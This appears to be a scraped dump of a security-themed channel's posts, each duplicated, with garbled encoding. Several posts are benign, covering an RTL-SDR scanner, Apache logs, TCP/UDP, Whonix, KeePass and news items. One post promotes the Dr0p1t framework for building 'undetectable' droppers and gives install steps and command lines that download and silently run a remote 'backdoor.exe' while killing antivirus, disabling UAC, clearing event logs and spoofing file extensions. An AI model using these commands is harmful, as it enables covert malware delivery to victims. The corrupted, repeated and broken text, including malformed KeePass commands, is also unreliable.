β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Termux-Linux special tool:
A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words a cheap, simple Spectrum Analyser.
The scanner attempts to overcome the tuner's frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git
2οΈβ£cd RTLSDR-Scanner
3οΈβ£Run 'python -m rtlsdr_scanner'.
4οΈβ£To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot
5οΈβ£File Menu
Open... - Open a saved scan
Save As... - Save a scan
Export... - Export a scan to a CSV file
Properties ... - Scan information
6οΈβ£Edit Menu
Preferences - Set dongle gain, calibration, Local Oscillator (positive offset for upconverters) and sample bands (see below)
Scan Menu
Start - Start a scan
Stop - Stop the scan
Stop at end - Stop the scan when the current sweep is finished (only in continuous mode)
7οΈβ£Tools Menu
Compare - Compare two previously saved scans
Auto Calibration - Perform a crude calibration of the dongle to a known signal (this should be a continuous, unwavering signal)
Tweaking
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Termux-Linux special tool:
A cross platform Python frequency scanning GUI for USB TV dongles, using the OsmoSDR rtl-sdr library.
In other words a cheap, simple Spectrum Analyser.
The scanner attempts to overcome the tuner's frequency response by averaging scans from both the positive and negative frequency offsets of the baseband data.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/EarToEarOak/RTLSDR-Scanner.git
2οΈβ£cd RTLSDR-Scanner
3οΈβ£Run 'python -m rtlsdr_scanner'.
4οΈβ£To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot
5οΈβ£File Menu
Open... - Open a saved scan
Save As... - Save a scan
Export... - Export a scan to a CSV file
Properties ... - Scan information
6οΈβ£Edit Menu
Preferences - Set dongle gain, calibration, Local Oscillator (positive offset for upconverters) and sample bands (see below)
Scan Menu
Start - Start a scan
Stop - Stop the scan
Stop at end - Stop the scan when the current sweep is finished (only in continuous mode)
7οΈβ£Tools Menu
Compare - Compare two previously saved scans
Auto Calibration - Perform a crude calibration of the dongle to a known signal (this should be a continuous, unwavering signal)
Tweaking
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - EarToEarOak/RTLSDR-Scanner: A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library - GitHub - EarToEarOak/RTLSDR-Scanner: A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Types of Apache Logs
Different types of Apache logs are controlled by different web server modules and have different control directives and the ability to specify the format of the log line.
π¦The following types of Apache web server logs are available:
Server error log is the most important log file. This is where Apache httpd will send diagnostic information and record any errors it encounters while processing requests. This is the first place to look when there is a problem with the server starting up or the server working, as it often contains details about what went wrong and how to fix it.
2οΈβ£Per-module logging
The LogLevel directive allows you to specify the log severity level for each module. Thus, if you fix the problem with only one specific module, you can increase its volume in the journal, while not receiving unnecessary information about other modules that do not interest you. This is especially useful for modules like mod_proxy or mod_rewrite where you want to know the details of what it is trying to do.
3οΈβ£Access Log
The server access log records all requests processed by the server.
4οΈβ£Additional configurable debug logging
This directive causes a custom message to be logged in the error log. A message can use variables and functions from ap_expr syntax. Links to HTTP headers do not add header names to the Vary header. Messages are logged.
5οΈβ£Forensic (forensic logs)
Registration is carried out before and after processing the request, so the forensic journal contains two journal lines for each request. Differs in the increased severity.
6οΈβ£CGI Script Execution Logs
If ScriptLog is not specified, an error log is not generated. If ScriptLog is installed, then any CGI errors are logged in the file specified as an argument.
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Types of Apache Logs
Different types of Apache logs are controlled by different web server modules and have different control directives and the ability to specify the format of the log line.
π¦The following types of Apache web server logs are available:
Error Log1οΈβ£Error Log
Per-module logging
Access Log
Additional configurable debug logging
Forensic (forensic logs)
CGI Script Execution Logs
Server error log is the most important log file. This is where Apache httpd will send diagnostic information and record any errors it encounters while processing requests. This is the first place to look when there is a problem with the server starting up or the server working, as it often contains details about what went wrong and how to fix it.
2οΈβ£Per-module logging
The LogLevel directive allows you to specify the log severity level for each module. Thus, if you fix the problem with only one specific module, you can increase its volume in the journal, while not receiving unnecessary information about other modules that do not interest you. This is especially useful for modules like mod_proxy or mod_rewrite where you want to know the details of what it is trying to do.
3οΈβ£Access Log
The server access log records all requests processed by the server.
4οΈβ£Additional configurable debug logging
This directive causes a custom message to be logged in the error log. A message can use variables and functions from ap_expr syntax. Links to HTTP headers do not add header names to the Vary header. Messages are logged.
5οΈβ£Forensic (forensic logs)
Registration is carried out before and after processing the request, so the forensic journal contains two journal lines for each request. Differs in the increased severity.
6οΈβ£CGI Script Execution Logs
If ScriptLog is not specified, an error log is not generated. If ScriptLog is installed, then any CGI errors are logged in the file specified as an argument.
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦British police arrest 746 criminals after cracking encrypted information on EncroChat
#News
>The National Anti-Crime Agency (NCA) announced that 746 people have been arrested after the information on EncroChat was intercepted and decrypted. According to the NCA, there are some iconic criminal leaders among the arrested. So far, the operation has seized a total of 54 million pounds, 77 firearms, two tons of drugs, 55 high-value cars and 73 luxury watches.
>After the European partners made a breakthrough in decrypting the encrypted messenger application EncroChat, this arrest, code-named Operation Venice, became possible. Since 2016, the United Kingdom's National Anti-Crime Bureau has been working with other law enforcement agencies around the world to crack the application's encryption. Two months ago, its partners in France and the Netherlands successfully infiltrated the platform and passed the discovered information to Europol. Thanks to this breakthrough, European law enforcement agencies also targeted criminals in their respective countries.
> According to the UK National Crime Prevention Bureau, EncroChat is operated by criminals outside the UK, making it more difficult to get started. NCA said that behind-the-scenes personnel of EncroChat realized that the application was compromised on June 13 and issued a warning to users to remind them to throw away their phones to reduce the possibility of arrest.
> The EncroChat application is usually loaded on uniquely modified smartphones, which cost about Β£1,500 and the contract period is 6 months. These mobile phones have instant messaging applications that can make VoIP calls and provide remote data self-destruction. Since Europol has intercepted this information, this security mechanism will not help criminals using these devices.
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦British police arrest 746 criminals after cracking encrypted information on EncroChat
#News
>The National Anti-Crime Agency (NCA) announced that 746 people have been arrested after the information on EncroChat was intercepted and decrypted. According to the NCA, there are some iconic criminal leaders among the arrested. So far, the operation has seized a total of 54 million pounds, 77 firearms, two tons of drugs, 55 high-value cars and 73 luxury watches.
>After the European partners made a breakthrough in decrypting the encrypted messenger application EncroChat, this arrest, code-named Operation Venice, became possible. Since 2016, the United Kingdom's National Anti-Crime Bureau has been working with other law enforcement agencies around the world to crack the application's encryption. Two months ago, its partners in France and the Netherlands successfully infiltrated the platform and passed the discovered information to Europol. Thanks to this breakthrough, European law enforcement agencies also targeted criminals in their respective countries.
> According to the UK National Crime Prevention Bureau, EncroChat is operated by criminals outside the UK, making it more difficult to get started. NCA said that behind-the-scenes personnel of EncroChat realized that the application was compromised on June 13 and issued a warning to users to remind them to throw away their phones to reduce the possibility of arrest.
> The EncroChat application is usually loaded on uniquely modified smartphones, which cost about Β£1,500 and the contract period is 6 months. These mobile phones have instant messaging applications that can make VoIP calls and provide remote data self-destruction. Since Europol has intercepted this information, this security mechanism will not help criminals using these devices.
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?
#FastTips
> The payoff for the reliability of the TCP protocol is what accounting calls βoverheadsβ - the bottom line is that to provide a mechanism for controlling packet delivery in TCP, a lot of data is sent that does not contain useful information, but only serves to install and connection control. For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,
> For this reason, both TCP and UDP are βgoodβ - it is important to use them correctly. For example, when streaming video, it does not matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.
>A detailed understanding of TCP and UDP matters when:
1) network traffic analysis
2) configure iptables network firewall
3) understanding and protecting against DoS attacks of some kind.
> For example, understanding the TCP connection mechanism, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?
#FastTips
> The payoff for the reliability of the TCP protocol is what accounting calls βoverheadsβ - the bottom line is that to provide a mechanism for controlling packet delivery in TCP, a lot of data is sent that does not contain useful information, but only serves to install and connection control. For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,
> For this reason, both TCP and UDP are βgoodβ - it is important to use them correctly. For example, when streaming video, it does not matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.
>A detailed understanding of TCP and UDP matters when:
1) network traffic analysis
2) configure iptables network firewall
3) understanding and protecting against DoS attacks of some kind.
> For example, understanding the TCP connection mechanism, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦some missed tips in linux :
#FastTips
1) Unsuccessful distribution base
The basis is taken Xubuntu, that is, in fact, Ubuntu. If you installed the latest versions of Ubuntu, you might have noticed how many shortcuts there are for different cloud services that most do not need. It seems that this is Windows, which runs a virus that has installed a couple of dozen shortcuts.
> It got to the point that Linux Mint (based on Ubuntu) BLOCKS the Snap installation (developed by Canonical Ltd.), which behaves like a real trojan - it installs hidden, overwrites part of the packages secretly, and secretly connects to remote servers. This was said last year ( https://blog.linuxmint.com/?p=3766 ) and was repeated again in this ( https://blog.linuxmint.com/?p=3906 ).
> My personal use of Ubuntu evoked only negative emotions. Constantly occurring errors and the proposal to send a report - I already had a similar OS, it was called Windows '98.
2) Unsuccessful tuning of the desktop environment
The distribution uses XFCE, but it is made to look like GNOME 3. Result: it is almost impossible to find and open a minimized application. In general, the feeling of the desktop: "Ponte is more expensive than usability."
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create an undetectable malware :
Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) ;)
π¦FEATURES :
The executable size is smaller compared to other droppers generated the same way.
Download executable on target system and execute it silently..
Self destruct function so that the dropper will kill and delete itself after finishing it work
Escape disk forensics by making all the files dropper create and
dropper also cleans its content before deletion
Clear event log after finishing.
Works with Windows, Linux and now have OSX support
Dr0p1t-Server feature (beta) so now you can work from browser See how to work with Dr0p1t-Server
Dr0p1t-Server have a scam option (beta) See how to work with Dr0p1t-Server
Find and kill antivirus before running the malware.
The ability to disable UAC.
The ability to run your malware as admin.
Full spoof by spoofing the file icon and extension to any thing you want.
ZIP files support so now you can compress your executable to zip file before uploading.
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/D4Vinci/Dr0p1t-Framework.git7οΈβ£Examples :
2οΈβ£chmod 777 -R Dr0p1t-Framework
3οΈβ£cd Dr0p1t-Framework
4οΈβ£sudo chmod +x install.sh
5οΈβ£./install.sh
6οΈβ£python Dr0p1t.py
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Whonix :
Whonix is a Linux-based operating system focused on anonymity and security. It is designed to hide the user's IP address / location and uses the Tor network to anonymize data traffic. This means that the server being accessed and the Tor network operators cannot easily determine which sites are being visited or the user's physical location.
Whonix is a Linux-based operating system focused on anonymity and security. It is designed to hide the user's IP address / location and uses the Tor network to anonymize data traffic. This means that the server being accessed and the Tor network operators cannot easily determine which sites are being visited or the user's physical location.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ What to choose: Whonix, Tails, Tor Browser ... :
1οΈβ£Whonix is not the only operating system for anonymity. Another analog is Tails . Like Whonix , Tails also uses Tor , so the question may be: is Tor better than the Tor browser ?
2οΈβ£ Choosing a tool for anonymity is more dependent on your needs.
3οΈβ£Tor browser will be enough if you want to bypass site blocking or want to hide your IP address in non-critical situations.
4οΈβ£The Tails operating system is designed for situations where it is not only critical to maintain anonymity, but also in the case of physical seizure of a computer, making it impossible to collect evidence. For this, for example, in Tails, it is impossible to save files other than on specially created encrypted storage. Program and operating system settings, as well as the history of any activity, are also not saved by default. To enable this, you need to read the instructions - safely, but not conveniently. In practice, many users do not need such measures. See also the Tails Guide
5οΈβ£Whonix focuses on ensuring anonymity - in fact, Whonix is broken down into 2 operating systems. One of them is a gateway through which Internet access is performed. And the second is a workstation. Thanks to this approach, even if the workstation is hacked and the attacker has a superuser password from it, it will be impossible to find out the user's IP address. This is achieved by the fact that the Whonix workstation in the properties of the virtual machine is configured to access the Internet only through the gateway - these settings cannot be changed from the virtual machine. Therefore, even if a hacker can change the settings inside Whonix, the maximum that he can achieve is to spoil the settings and make it impossible to access the Internet, but not to compromise IP.
6οΈβ£At the same time, you can work and save files in Whonix as in any ordinary operating system. That is, Whonix is aimed at anonymity, but not at counteracting the collection of electronic evidence.
π¦What version of Whonix to download
> To run Whonix, you need a free program for working with virtual machines - VirtualBox .
> To broaden your horizons , the VirtualBox Manual is recommended. At a minimum, read about installing this program on your operating system:
1) Install VirtualBox on Windows/Linux
2) Go to the Whonix download page on the official website: https://www.whonix.org/wiki/Download
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Whonix
Download Whonix (FREE)
FREE Download Whonix. Privacy Protection. Anonymity Online. For Windows, macOS, Linux.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Which password manager to choose. What is better KeePass, KeePassX or KeePassXC
> There are many password managers. It is worth choosing the one with the source code open (which allows you to make sure that your passwords will not be sent to the attacker and / or there are no bookmarks in the encryption algorithm).
> One of the popular, well-established is KeePass . Initially, this program was written for Windows, but with Mono (an open implementation of the .NET platform, including a working environment and a compiler), it also works on Linux, Mac OS X.
KeePass has two popular branches:
1) KeePassX is a cross-platform program, with a branch there were some advantages over KeePass, now development has slowed down
2) KeePassXC - another cross-platform fork, also had some advantages, but at present it functions the same as KeePass. Small advantages - the Russian language is already built-in and does not require additional installation (as needed in KeePass). Also, the program is initially cross-platform and looks the same in any operating system. While KeePass looks a little different, due to the fact that different platforms use the original .NET environment or its open analogue Mono
> All three of these programs have mutually compatible databases.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£wget
curl -s https://keepass.info/translations.html | grep -o -E 'https://downloads.sourceforge.net/keepass/KeePass[0-9.-β +Russian.zip' | tail -n 1
(avaible also in english)2οΈβ£unzip KeePass - * - Russian.zip
3οΈβ£rm KeePass - * - Russian.zip
4οΈβ£sudo mkdir / usr / share / keepass / Languages
5οΈβ£sudo mv Russian.lngx / usr / share / keepass / Languages
keepass
6οΈβ£How to create a KeePass database
> The principle of the password manager is that all data (logins and passwords) is encrypted and stored in one database. You can select any name and any location of the database file. It is recommended that you back it up regularly.
> Databases can be any number.
7οΈβ£To transfer all encrypted passwords to another computer, just copy the database file (everything is stored in one file).
As you can see, most of the functions in the interface are inactive, until the database is created, click the " Create " icon :
π¦for windows To download KeePass, go to the official website: https://keepass.info/download.html
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
keepass.info
Downloads - KeePass
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AGAIN Zoom reveals a remote code execution vulnerability that only affects Windows 7 and below
#NEWS
> Security researchers discovered a remote code execution vulnerability in the Windows Zoom client. From the current perspective, only systems with Windows 7 installed will be truly exposed to risks. Before Zoom actually solved the vulnerability, security company 0patch first released a micro-patch for the vulnerability. The company explained that the vulnerability is high in risk, and the remote attacker only needs to persuade the user to perform a simple action, such as opening One file can exploit this vulnerability.
> Once the malicious file is loaded, the attacker can launch an RCE attack without any warning displayed on the victim's computer. Although the vulnerability exists in all Windows versions of the Zoom client, only Windows 7 computers will be threatened.
"This vulnerability can only be exploited on Windows 7 and earlier versions of Windows. It is likely to be exploited on Windows Server 2008 R2 and earlier versions, although we have not tested it; but no matter which system, our micro-patch Will protect you, no matter where you use the Zoom Client," 0patch pointed out.
Subsequently, Zoom fixed this bug in version 5.1.3 of its Windows client. Users who previously installed the micropatches released by 0patch do not need to do anything when applying the official repair version of Zoom, because the micropatches themselves will automatically fail.
> This vulnerability shows how important it is to always run a supported version of Windows. Official support for Windows 7 ended in January this year, which means that this operating system from 2009 can no longer obtain any new updates and security patches from Microsoft . Additional fixes are shipped through customized security updates (available for a fee) or using third-party products such as 0patch.
#NEWS @UNDERCODENEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β